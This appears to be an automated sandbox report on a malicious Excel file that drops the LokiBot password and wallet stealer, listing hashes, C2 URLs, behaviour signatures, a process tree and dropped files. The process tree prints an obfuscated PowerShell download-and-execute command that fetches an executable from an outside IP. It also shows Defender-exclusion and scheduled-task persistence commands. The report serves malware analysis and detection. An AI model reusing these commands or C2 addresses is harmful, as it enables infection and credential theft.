Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2024 08:55

General

  • Target

    f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls

  • Size

    1.1MB

  • MD5

    5a69ac58c3133e24a783cf4ea670a243

  • SHA1

    7fdf7feed6f105ce6bfeb34fb44c9c58dfe9057e

  • SHA256

    f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d

  • SHA512

    5b338a97aacf226f9e4360eec8fa2149cb5a77836f357e76c276a799625f91ceb4c9b49c0ef13a9fc31a98770eb0088192ba0b05b2ec668beaa5cd71ccc30c04

  • SSDEEP

    24576:auq9PLiijE2Z5Z2amwshXCdQtF84LJQohL7m90Ns4Ql1xzRjpCrHac:auEPLiij7Z5ZKwsAsFjLJQohm90Clvzu

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2308
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
      "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2984
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2920
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFCE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCFCD.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1960
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:960
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1652
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4192.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2056
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:1856
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          PID:2536
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2568

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1087EC93233409051A3831D3D6C361C8

    Filesize

    504B

    MD5

    0b60282e9ddea43ca313d63ec56740ad

    SHA1

    e7cc9ff054f23bdd36103a4e90cc9f7e8e8b214a

    SHA256

    358893a6900a0c0cc4d1457dbe7bcdef7e24b7c437d3623806f23827caac2c13

    SHA512

    ed83aaf8dd61a513ec6854b3ba948fcfd8d4ffcbefebe082330d320f0c234003ba0b290eada14f79836cffd792931eb19bd3539ab2801c9c00c244e228439024

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    8948537a3d8cf6472968eaaa4d737bc7

    SHA1

    be0804f1dba8f2821fbfeb6086ba99133977d6ab

    SHA256

    85acea3f10c6eda76af7cf92e6a51d962be38db9eef1c3050941e09a1251a576

    SHA512

    ceab54352af50b7678f937e2370ba7b94efdf30b0af8797257fedc929bab892f3aa66451ce52b3804e6fa27e29354c76168fda2a7c125996f97fd66f716897df

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8

    Filesize

    550B

    MD5

    07495b0fdb6a3d3885aec8db9ff33bf7

    SHA1

    d9b06e201bba1af286cc8ebcf4b146929faf439b

    SHA256

    3d7fbd0e467e9a23b2fa90f47a7a44fda0efb1caf9b4ae7573ca778104a50e62

    SHA512

    200f82d25f2774dfed3a83366bbe1837feb0a2a9faa0c703f0a2fd7206a4879a6e5793ed7128260086bd69717479ab638efab740b63d4f5cb6505dc9b8366122

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

    Filesize

    8KB

    MD5

    50388b1f7dd763e374254a7cba6c8ec5

    SHA1

    6e6c486bc41a4bb1978c05585c01d2b8d9c60a5d

    SHA256

    7cc793038da07c244953d691f1206b00811817e1c623b582ef94276cecd6d77a

    SHA512

    0b2a143d563f62dd913de0ead3af93e27a9216758ae644d5dcf05d234d90771966ee27bc634c3749bf78a87d9656fa4f2b6e1547c4f260df08639136d11a8709

  • C:\Users\Admin\AppData\Local\Temp\CabC6D8.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESCFCE.tmp

    Filesize

    1KB

    MD5

    2b5b10ec04cd67d8945424bb16587308

    SHA1

    10238eed463047bcf2c316383d6f72e3eca14485

    SHA256

    f291752643b331119ed38f135b55d443e89a830869f96af62eee78124ee742f4

    SHA512

    f06ab9a0afa20dea09ac2a2c2c223d157ec8e42c294c9352f95037da68a95ba434fbc1ee146bd6db640a5f8d5d2ac6410b2a16e0a7e236024f9ada938867c34b

  • C:\Users\Admin\AppData\Local\Temp\tmp4192.tmp

    Filesize

    1KB

    MD5

    e7f601e9f8dfa0e17e3a9e63ed32c661

    SHA1

    4f71185e0f401b03c985c6882a8d1afc36949ced

    SHA256

    45c41a8d88c697291c6d4051d4bf470a6754822a7340042737f005d3c3bcfd0e

    SHA512

    1d3f834da17afc1039a222a271fbaa725dffe175f7c91105c7c4b68ea9e2e3f0d399c20c0095cd17d3e37e265a84775d301e9779b0e06789ed70fc62d3537567

  • C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.dll

    Filesize

    3KB

    MD5

    ec937630adcf8977be40884de3ec18e8

    SHA1

    c9d6bea53470543a1d8a9ea3de43e3eb2560d1e4

    SHA256

    b8995b4ee5e11d4c99a12fea932b741d89f484fa65855209b61eee88281e061f

    SHA512

    c5286de86e12d788e3d14264f09008252f1235f35ad6641a5f9f74653b98517713b3e02f147883f2767733079ead772fc0cc6e6e536716c42e046476537dfc98

  • C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.pdb

    Filesize

    7KB

    MD5

    840cd591a20f611a1157774bb56a2b85

    SHA1

    087e28cc8c1ab176bc0231a744d86efb4ed19216

    SHA256

    17d1272995fe68d400161189eb4c101b4a3939650561992505a6b1ae24da2fc1

    SHA512

    80d8b2a0d0cb0777f63ec442c664be272d81bd1c818331dfe72a4170a5d869e23d9856b4bce48e6e910fa3f74e42cdd15359d97c1b63bdf65f63779039fb9267

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    a56ee2770383b51628d2d20ce179de0f

    SHA1

    288a2a7c48dfe0bac0a7388fce8122845cfb04f2

    SHA256

    8909f8abfd3b7b06136531eb3ca81f0a3377369d80e9597a94834c33ca154094

    SHA512

    e64a4cc3ab34c7c96ffdbdab63924b93c071f4491d1617e1fbbcd4117e63ffebe63d72254fa30b6af321b94c5e6b228d7b79d9207255962035c7258ecd96eb4a

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    d6d823d046675e6c32b4825035b0f4c6

    SHA1

    d815615054eb8a969449fae9019eec55aecdc1f5

    SHA256

    e5d81951dc9eba7cb82682e6d8a6855185a4a86f3d3eaed773d890a594d9573f

    SHA512

    fe401cc29e6c90e0320d74ec3e39adfe0e24a0f7a3b8f039171ec22849d69f2fb6abb55785aaf197f0a3947109559d638b61690acdf23c2e7ea1d42bcdc10232

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    586KB

    MD5

    74061922f1e78c237a66d12a15a18181

    SHA1

    e31ee444aaa552a100f006e43f0810497a3b0387

    SHA256

    89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c

    SHA512

    306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCCFCD.tmp

    Filesize

    652B

    MD5

    a880c8b9bda21d20c8bf1b504fc8c17e

    SHA1

    49b3312c2b1047860334d71f596bc990fb7faeb4

    SHA256

    777f5f69471e7c6458b1bde2a47f64b3379d7c3ad2486c6fcd7cbf643eab0eb1

    SHA512

    227a3bf0235198e70ad25b2e1aadc8d8ca226487ad37ba9e7c99bdb7b34ca35877cba15d31c906c3203a1c4b8df85b4b3ad6b39bedbf57bebe47b4c1d21a2797

  • \??\c:\Users\Admin\AppData\Local\Temp\zv9ghrdm.0.cs

    Filesize

    484B

    MD5

    fe82050659a8b97690d60529499222c1

    SHA1

    7cc50135852b46dd1e36f2ff98506613db525a68

    SHA256

    64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a

    SHA512

    59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

  • \??\c:\Users\Admin\AppData\Local\Temp\zv9ghrdm.cmdline

    Filesize

    309B

    MD5

    c57bc8cdba00b7c06f649f8240a63731

    SHA1

    520a60648b730f63e2e8b6d982997ed806cdf9b3

    SHA256

    71e67c9a0696553812be4348b4a3797116fd185d88d2189d2b68786204239900

    SHA512

    f6c97bb1b61b67b0cb9e0e708df9e457d68c67643f9f04448297948fad7570c694c49af83486e40e491ac1511a36c31a3f2cc2af201fe72f022e886e51a95a2c

  • memory/2308-60-0x000000007243D000-0x0000000072448000-memory.dmp

    Filesize

    44KB

  • memory/2308-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2308-1-0x000000007243D000-0x0000000072448000-memory.dmp

    Filesize

    44KB

  • memory/2308-17-0x0000000002D20000-0x0000000002D22000-memory.dmp

    Filesize

    8KB

  • memory/2568-97-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2568-123-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2568-91-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2568-104-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2568-102-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2568-101-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2568-99-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2568-95-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2568-93-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2568-132-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2712-16-0x0000000002060000-0x0000000002062000-memory.dmp

    Filesize

    8KB

  • memory/2964-72-0x0000000005290000-0x00000000052F4000-memory.dmp

    Filesize

    400KB

  • memory/2964-70-0x00000000001B0000-0x0000000000248000-memory.dmp

    Filesize

    608KB

  • memory/2964-71-0x0000000000320000-0x0000000000332000-memory.dmp

    Filesize

    72KB